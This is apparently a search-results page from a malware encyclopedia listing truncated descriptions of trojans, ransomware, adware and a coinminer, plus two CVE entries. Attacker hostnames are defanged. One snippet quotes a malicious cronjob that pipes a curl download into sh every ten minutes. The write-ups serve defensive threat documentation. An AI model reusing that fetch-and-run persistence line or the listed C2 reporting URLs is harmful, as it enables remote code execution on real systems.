Search
Keyword: URL
which connects to the URL https://{BLOCKED}r.ru/ Trojan.Win32.Hesv.cmfp (KASPERSKY), Ransom.MyLittleRansom (NORTON), Mal/Cryptear-A (SOPHOS_LITE) Dropped by other malware, Downloaded from the Internet
the file from the following URL and renames the file when stored in the affected system: https://{BLOCKED}e.ibb.co/kO6xZ6/insane_uriel_by_urielstock_3.jpg Other Details This Ransomware connects to the
}.{BLOCKED}.53.15/bermuda/triangle.php It saves the files it downloads using the following names: %User Temp%\shereder.exe - may also contain an error code if the URL is inaccessible (Note: %User Temp%
CVE-2009-3985 �Mozilla Firefox before 3.0.16 and 3.5.x before 3.5.6, allows remote attackers to associate spoofed content with an invalid URL by setting document.location to this URL, and then
and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via a long file: URL in an argument, aka Bug Id 6854303. sun jdk 1.5.0,sun jdk 1.6.0,sun jre 1.3.1_01,sun jre
downloaded url file name}[1].txt - (example: %Temporary Internet Files%\Content.IE5\{random}\discreteness[1].txt) (Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and
downloads a possibly malicious file from a certain URL. The URL where this malware downloads the said file depends on the following parameter(s) passed on to it by its components: val prime Information Theft
usually C:\Windows\System32.) NOTES: This Trojan sets the system time to September 27, 2019, 09:04 AM. If there is an active Internet connection, it opens the browser to view the non-malicious URL
NOTES: It connects to the following URL to report its installation: http://api.{BLOCKED}right.com/rs This adware may display advertisements such as popups and banners in browsers. This adware accepts the
of this writing, the files to be downloaded are not available in the server It connects to the following URL to report system information: http://{BLOCKED}neiro1.{BLOCKED}dagemdesites.ws/cisco.asp
certain URL. The URL where this malware downloads the said file depends on the following parameter(s) passed on to it by its components: data jar lhost lport NOTES: This malware combines the two downloaded
Windows Server 2012.) NOTES: It connects the following URL to download data related to GeoIP: https://www.{BLOCKED}d.com/en/locate-my-ip-address The downloaded data should contain OCEANIA. The downloaded
kdb wdb nv2 flkb sko xbrl sxc p12 tax It does the following: It connects to the following URL to report the affected system's information: http://{BLOCKED}plin.net/wordpress/wp-includes/oops.php?id
kdb wdb nv2 flkb sko xbrl sxc p12 tax It does the following: It connects to the following URL to report the affected system's information: http://{BLOCKED}plin.net/wordpress/wp-includes/oops.php?id
state Lock workstation Display a message box Perform port mapping Capture screen Perform remote shell NOTES: It connects to the following URL to send and receive information: http://web.{BLOCKED
the following URL and renames the file when stored in the affected system: http://{BLOCKED}hirrotaract.org/487ygfh?sFpvKJ=sFpvKJ http://{BLOCKED}livingph.com/487ygfh?sFpvKJ=sFpvKJ http://{BLOCKED
it creates file and directory I - renames file to directory name J - creates folder from filename K - creates file and sets Last Modified to new time L - connects to URL passed in z1 M - executes file
)|sh Creates the following cronjob to enable automatic execution of a shell script found in the URL every 10 minutes: Path: /etc/cron.d/root Content: */10 * * * * root (curl -fsSL -m180
when visiting malicious sites. Other Details This Coinminer accepts the following parameters: -a, --algo=ALGO cryptonight (default) or cryptonight-lite -o, --url=URL URL of mining server -O, --userpass
at every system startup: Extracted content of WindowsSecure.zip Download Routine This Trojan downloads the file from the following URL and renames the file when stored in the affected system: https://